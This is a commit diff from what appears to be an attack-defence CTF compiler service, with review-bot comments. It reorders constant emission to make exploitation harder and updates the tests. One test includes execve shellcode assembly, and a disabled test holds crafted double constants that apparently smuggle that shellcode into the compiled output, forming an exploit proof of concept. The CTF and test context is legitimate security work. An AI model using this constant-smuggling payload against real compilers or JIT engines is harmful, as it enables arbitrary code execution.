
Commit 5ca86fe

rkhapovkeltecc
authored andcommitted
[dcs] use unordered map in constants contexts to make sploit harder
1 parent 100a8f4 commit 5ca86fe

6 files changed

+128
-128
lines changed


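--- a/internal/dcs/back/lang/src/compiler/compiler.cpp
+++ b/internal/dcs/back/lang/src/compiler/compiler.cpp
@@ -52,8 +52,8 @@ class CompilerWithContext {
 }
 };
 
-std::map<std::string, std::shared_ptr<ConstantCompilationContext>> constantNameToContext;
-std::map<std::string, std::shared_ptr<FunctionCompilationContext>> functionNameToContext;
+std::unordered_map<std::string, std::shared_ptr<ConstantCompilationContext>> constantNameToContext;
+std::unordered_map<std::string, std::shared_ptr<FunctionCompilationContext>> functionNameToContext;
 std::shared_ptr<FunctionCompilationContext> currentCompilationFunction;
 std::string emitError;
 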
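Review bot: `std::unordered_map` iteration order is unspecified but still reproducible for a given standard library and insertion sequence, so moving `constantNameToContext` and `functionNameToContext` to it permutes any layout derived from them without making that layout unpredictable. If the aim in the commit title is to harden the emitted constant layout, that property needs an explicit mechanism (for example a per-compilation shuffle seeded from a CSPRNG) rather than a container side effect, and the members should carry a comment such as `// iteration order is unspecified; emitted layout must not be treated as secret`. No `#include <unordered_map>` is visible; the include block lies outside the hunk, so confirm the header is included directly rather than transitively. The `CompilerWithContext` class body continues outside the hunk.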

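--- a/internal/dcs/back/lang/tests/compiler/compiler_tests.cpp
+++ b/internal/dcs/back/lang/tests/compiler/compiler_tests.cpp
@@ -47,11 +47,11 @@ fun main() { return 0; }
 retq
 
 
-_c_const_main_0: .quad 0x0
-e: .quad 0x400599999999999a
-pi: .quad 0x400921fb5a7ed197
 x1: .quad 0x3ff3b31f84aa9f25
+e: .quad 0x400599999999999a
 x2: .quad 0xc10c97d0fc27e953
+_c_const_main_0: .quad 0x0
+pi: .quad 0x400921fb5a7ed197
 .sign_bit: .quad 0x8000000000000000
 )", "");
 }
@@ -157,16 +157,16 @@ fun main() {
 retq
 
 
-_c_const_lol_0: .quad 0x4045800000000000
-_c_const_lol_1: .quad 0x3ff0000000000000
-_c_const_lol_2: .quad 0x4045800000000000
 _c_const_lol_3: .quad 0x4046800000000000
-_c_const_main_0: .quad 0x4045000000000000
+_c_const_lol_2: .quad 0x4045800000000000
+_c_const_lol_0: .quad 0x4045800000000000
+x1: .quad 0x3ff3b31f84aa9f25
 _c_const_main_1: .quad 0x409370e4c91a90a5
 e: .quad 0x400599999999999a
-pi: .quad 0x400921fb5a7ed197
-x1: .quad 0x3ff3b31f84aa9f25
 x2: .quad 0xc10c97d0fc27e953
+_c_const_main_0: .quad 0x4045000000000000
+_c_const_lol_1: .quad 0x3ff0000000000000
+pi: .quad 0x400921fb5a7ed197
 .sign_bit: .quad 0x8000000000000000
 )", "");
 }
@@ -377,9 +377,9 @@ fun main() {
 retq
 
 
-_c_const_main_0: .quad 0x400921fb5a7ed197
-_c_const_main_1: .quad 0x400599999999999a
 _c_const_main_2: .quad 0x4094e40000000000
+_c_const_main_1: .quad 0x400599999999999a
+_c_const_main_0: .quad 0x400921fb5a7ed197
 .sign_bit: .quad 0x8000000000000000
 )", "");
 }
@@ -407,8 +407,8 @@ fun main() {
 retq
 
 
-_c_const_main_0: .quad 0x400921fb5a7ed197
 _c_const_main_1: .quad 0x400599999999999a
+_c_const_main_0: .quad 0x400921fb5a7ed197
 .sign_bit: .quad 0x8000000000000000
 )", "");
 }
@@ -526,8 +526,8 @@ fun main() {
 retq
 
 
-_c_const_main_0: .quad 0x400921fb5a7ed197
 _c_const_main_1: .quad 0x400921fb5a7ed197
+_c_const_main_0: .quad 0x400921fb5a7ed197
 .sign_bit: .quad 0x8000000000000000
 )", "");
 }
@@ -589,9 +589,9 @@ fun main() {
 retq
 
 
-_c_const_main_0: .quad 0x400921fb5a7ed197
-_c_const_main_1: .quad 0x400599999999999a
 _c_const_main_2: .quad 0x4094e40000000000
+_c_const_main_1: .quad 0x400599999999999a
+_c_const_main_0: .quad 0x400921fb5a7ed197
 .sign_bit: .quad 0x8000000000000000
 )", "");
 }
@@ -629,10 +629,10 @@ fun main() {
 retq
 
 
-_c_const_main_0: .quad 0x3ff0000000000000
-_c_const_main_1: .quad 0x4000000000000000
 _c_const_main_2: .quad 0x4000000000000000
+_c_const_main_1: .quad 0x4000000000000000
 _c_const_main_3: .quad 0x3ff0000000000000
+_c_const_main_0: .quad 0x3ff0000000000000
 .sign_bit: .quad 0x8000000000000000
 )", "");
 }
@@ -679,10 +679,10 @@ fun main() {
 retq
 
 
-_c_const_main_0: .quad 0x40091eb851eb851f
-_c_const_main_1: .quad 0x4008000000000000
 _c_const_main_2: .quad 0x3ff0000000000000
+_c_const_main_1: .quad 0x4008000000000000
 _c_const_main_3: .quad 0x4000000000000000
+_c_const_main_0: .quad 0x40091eb851eb851f
 .sign_bit: .quad 0x8000000000000000
 )", "");
 }
@@ -771,8 +771,8 @@ fun main() {
 retq
 
 
-_c_const_main_0: .quad 0x4014000000000000
 _c_const_main_1: .quad 0x4018000000000000
+_c_const_main_0: .quad 0x4014000000000000
 .sign_bit: .quad 0x8000000000000000
 )", "");
 }
@@ -815,9 +815,9 @@ R"(
 ._0:
 
 
-_c_const_main_0: .quad 0x3ff0000000000000
-_c_const_main_1: .quad 0x4000000000000000
 _c_const_main_2: .quad 0x40091eb851eb851f
+_c_const_main_1: .quad 0x4000000000000000
+_c_const_main_0: .quad 0x3ff0000000000000
 .sign_bit: .quad 0x8000000000000000
 )", "");
 }
@@ -867,8 +867,8 @@ R"(
 retq
 
 
-_c_const_main_0: .quad 0xbff0000000000000
 _c_const_main_1: .quad 0xbff0000000000000
+_c_const_main_0: .quad 0xbff0000000000000
 .sign_bit: .quad 0x8000000000000000
 )", "");
 }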
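Review bot: The expected assembly strings now hard-code one particular `std::unordered_map` iteration order (for instance `x1`, `e`, `x2`, `_c_const_main_0`, `pi` in the first hunk), which the standard leaves unspecified, so these tests can fail on another standard library or version even when the compiler output is correct. The same applies to all eleven hunks in this file. Comparing the constant lines order-independently, for example by sorting the `name: .quad value` lines of both strings before the comparison, would keep the tests meaningful; at minimum add a comment such as `// constant order follows std::unordered_map iteration on the reference toolchain`. The test bodies start outside the hunks.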

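--- a/internal/dcs/back/lang/tests/functional_tests.cpp
+++ b/internal/dcs/back/lang/tests/functional_tests.cpp
@@ -585,7 +585,7 @@ TEST(Vuln, DoublesFromHexParsedCorrectly) {
 }
 }
 
-TEST(Vuln, DoubleFromHexParsedCorrectly2) {
+TEST(Vuln, GenerateVulnCode) {
 auto shellText = R"(
 .section .text
 .globl _start
@@ -602,9 +602,6 @@ TEST(Vuln, DoubleFromHexParsedCorrectly2) {
 leaq cmd(%rip), %rdi
 movq $59, %rax
 syscall
-pop %rax
-pop %rax
-pop %rax
 leaveq
 ret
 
@@ -627,75 +624,80 @@ TEST(Vuln, DoubleFromHexParsedCorrectly2) {
 
 auto p = reinterpret_cast<double*>(r.Translated->data());
 
+std::unordered_map<std::string, std::string> nameToValue;
+std::vector<std::string> names;
 for (std::size_t i = 0; i < r.Translated->size() / sizeof(double); ++i) {
 std::stringstream ss;
 ss << std::setprecision(30) << p[i];
-LOG(INFO) << ss.str();
+auto val = ss.str();
 double v;
 ss >> v;
 
 for (std::size_t j = 0; j < sizeof(double); ++j) {
 ASSERT_EQ((*r.Translated)[i * sizeof(double) + j], *(reinterpret_cast<uint8_t*>(&v) + j));
 }
+
+auto name = Format("_%04x", i);
+names.push_back(name);
+nameToValue[name] = "";
 }
-}
 
-TEST(Vuln, DISABLED_VulnMVP) {
-/*
-fun main() {
-a = 9.13311275417349147128740860176e+164;
-b = 2.23334226138660938778544477852e+40;
-c = 1.57054810607513511574371074205e+43;
-d = 5.70322518485311116492001613112e-306;
-if (a < b) {
-return a + b + c + d;
+std::size_t i = 0;
+for (auto &n : nameToValue) {
+std::stringstream ss;
+ss << std::setprecision(30) << p[i++];
+n.second = ss.str();
+}
+
+for (auto &n : names) {
+LOG(INFO) << Format("%s = %s;", n.c_str(), nameToValue[n].c_str());
 }
 }
-*/
-assertProgramResult(R"(
-a3b5c = 9.01665960969080694903108994646e-308;
-a3b5d = 5.89900095836992470543979457601e-308;
-a3b5e = 2.94950047918496235271989728801e-308;
-a3b5f = -1.13962551584212620632980908507e-244;
-a3b5g = -11920.0000000047675712266936898;
-a3b5h = 1.28326448731251798597851684744e-78;
-a3b5i = 6.29284709594975605135792094167e-92;
-a3b5j = 2.1971303441320653080330698334e-152;
-a3b5k = 3.87546157797830208220587864688e-80;
-a3b5l = 2.86530687399045625656107066942e+161;
-a3b5m = 5.38409467802000282671150077615e+241;
-a3b5n = 3.11888437715206740075614361764e+161;
-a3b5o = 1.41894014867253636496431508459e+161;
-a3b5p = 4.39558737237486546973012633094e+252;
-a3b5q = 5.52559648449915692702815701664e+257;
-a3b5r = 3.4653160729132520229722030536e+185;
-a3b5s = 1.29503525642399536129001394637e+171;
-a3b5t = 8.25971437589206984708987682454e-154;
-a3b5u = 3.11888436252934216500734194682e+161;
-a3b5v = 1.41894014867253636496431508459e+161;
-a3b5w = 4.27255621593463064889140018959e+180;
-a3b5x = 3.11888404154024059066604380509e+161;
-a3b5y = 1.41894014867253636496431508459e+161;
-a3b5z = 4.39558737237486546973012633094e+252;
-a3b6a = 5.52559648449915692702815701664e+257;
-a3b6b = 3.4653160729132520229722030536e+185;
-a3b6c = 1.29503525642399536129001394637e+171;
-a3b6d = 8.25971437589206984708987682454e-154;
-a3b6e = 3.17556682638780341692405072892e-120;
-a3b6f = 7.43083922896928744450392564933e-120;
-a3b6g = 9.31476625042255462280623371223e+242;
-a3b6h = 3.98455339352822777031486764751e+252;
-a3b6i = 3.46513456246328025214221041058e+185;
-a3b6j = 1.29503525642399536129001394637e+171;
-a3b6k = 1.19782304862903820345902151854e+243;
-a3b6l = 4.45822432662471531958872096101e+252;
-a3b6m = 3.80282228790878296803396164557e-317;
-a3b6n = -6.82852348231868590359212812058e-229;
-
-
-fun main() {
-if (a3b6k < a3b6m) {
-return a3b6m;
+
+TEST(Vuln, DISABLED_VulnMVP) {
+assertProgramResult(R"(
+_0000 = 4.45822432662471531958872096101e+252;
+_0001 = 1.19782304862903820345902151854e+243;
+_0002 = 1.91433085964668933099730042059e+261;
+_0003 = 3.98455339352822777031486764751e+252;
+_0004 = 9.73522563016263357401293305748e-315;
+_0005 = 3.88936149933469592127393174833e+174;
+_0006 = 3.88936149933469592127393174833e+174;
+_0007 = 4.45822432662471531958872096101e+252;
+_0008 = 5.93621147035131015845707833809e+169;
+_0009 = 5.52559648449915692702815701664e+257;
+_000a = 6.32280097505374462953932699201e+233;
+_000b = 8.25971437587339054081582628633e-154;
+_000c = 9.31476625662437923964372193661e+242;
+_000d = 5.93621147035131015845707833809e+169;
+_000e = 6.53747834600816911773243398146e-125;
+_000f = 6.53747834600816911773243398146e-125;
+_0010 = 3.9381538893456823461224877281e-62;
+_0011 = 3.11888404251331059194979670708e+161;
+_0012 = 5.52559648449915692702815701664e+257;
+_0013 = 3.4653160729132520229722030536e+185;
+_0014 = 1.29503525642399536129001394637e+171;
+_0015 = 1.9143324972053054017456038103e+261;
+_0016 = 5.52559648449915692702815701664e+257;
+_0017 = 1.33980497747332409769287086757e-152;
+_0018 = 3.88936149933469592127393174833e+174;
+_0019 = 4.39558737237486546973012633094e+252;
+_001a = 1.91429491296407703192166757816e+261;
+_001b = -6.82761769577296130672065869357e-229;
+_001c = 1.19782304862903820345902151854e+243;
+_001d = 1.35452787268204745946619571028e+243;
+_001e = -3605727437012366848;
+_001f = -11920.0000000052332325140014291;
+_0020 = -1.13962551584212620632980908507e-244;
+_0021 = 1.41894014867253636496431508459e+161;
+_0022 = 3.08856759534166243916303683284e-308;
+_0023 = 6.17713519068332487832607366568e-308;
+_0024 = 1.08805855771401084070533089734e-306;
+_0025 = 9.5729280743176072948036481258e-308;
+
+fun main() {
+if (_001a < _0025) {
+return _0023;
 }
 }
 )", 0.0);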
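Review bot: In `GenerateVulnCode`, `Format("_%04x", i)` passes a `std::size_t` where `%x` expects `unsigned int`; if `Format` is printf-style (its definition is not visible here) that is a varargs type mismatch, so write `Format("_%04zx", i)` or cast the argument with `static_cast<unsigned>(i)`. In the same loop `auto val = ss.str();` is never read and can be dropped. The test asserts only the round-trip of each double and otherwise just logs text, so a short comment stating that it is a generator rather than a regression test would help the next reader. The test body starts outside the hunk.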

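--- a/internal/dcs/back/server/src/main.cpp
+++ b/internal/dcs/back/server/src/main.cpp
@@ -140,7 +140,7 @@ int main(int argc, char **argv) {
 }
 auto record = storage->Get(token);
 if (record->Status == Storage::OperationStatus::InvalidToken) {
-response.status = 400;
+response.status = 404;
 nlohmann::json j{
 {"status", "error"},
 {"message", "invalid token"}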
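Review bot: The switch from 400 to 404 for `Storage::OperationStatus::InvalidToken` is a client-visible contract change with no comment or named constant explaining it, while the JSON body still reports `invalid token`. A one-line comment above `response.status = 404;`, such as `// unknown token is reported as a missing resource, not a malformed request`, would record the intent, and any client that matched on 400 needs updating alongside it. `record` is dereferenced on the preceding context line without a visible null check; whether `storage->Get` can return null is not shown in this hunk. `main` continues outside the hunk.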

services/dcs/back/dcsserver

-40 Bytes
Binary file not shown.
